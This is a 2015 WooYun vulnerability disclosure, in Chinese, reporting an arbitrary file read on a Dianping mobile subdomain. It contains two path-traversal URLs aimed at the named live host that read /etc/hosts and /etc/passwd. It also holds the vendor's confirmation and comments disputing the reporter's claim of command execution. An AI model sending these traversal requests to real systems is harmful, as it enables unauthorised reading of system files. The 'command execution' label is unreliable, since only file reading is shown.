大众点评网某分站任意文件读取

漏洞概要

缺陷编号:WooYun-2015-0125978

漏洞标题:大众点评网某分站任意文件读取

相关厂商:大众点评

漏洞作者:0x 80

提交时间:2015-07-10 18:33

公开时间:2015-08-24 20:46

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

大众点评网某处远程命令执行漏洞(非st2)

详细说明:

http://m.dianping.com/mjob/new/readFile.action?filename=../../../../../../../../../../etc/hosts

http://m.dianping.com/mjob/new/readFile.action?filename=../../../../../../../../../../etc/passwd

漏洞证明:

修复方案:

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-1020:45

厂商回复:

台风今天到上海了,我们都赶紧下班躲台风;
但是看到这个漏洞,很明显,我们得顶着台风回公司加班~~

最新状态:

2015-07-11:不知道洞主说的:大众点评网某处远程命令执行漏洞(非st2) 在哪儿?

评价

  1. 2010-01-01 00:00 xtnnd 白帽子 | Rank:105 漏洞数:10)

    17级台风 啦啦啦 你们要住公司了

  2. 2010-01-01 00:00 xyang 白帽子 | Rank:136 漏洞数:11)

    厂商回复好无辜的样子

  3. 2010-01-01 00:00 Hax0rs 白帽子 | Rank:17 漏洞数:2)

    哪里来的命令执行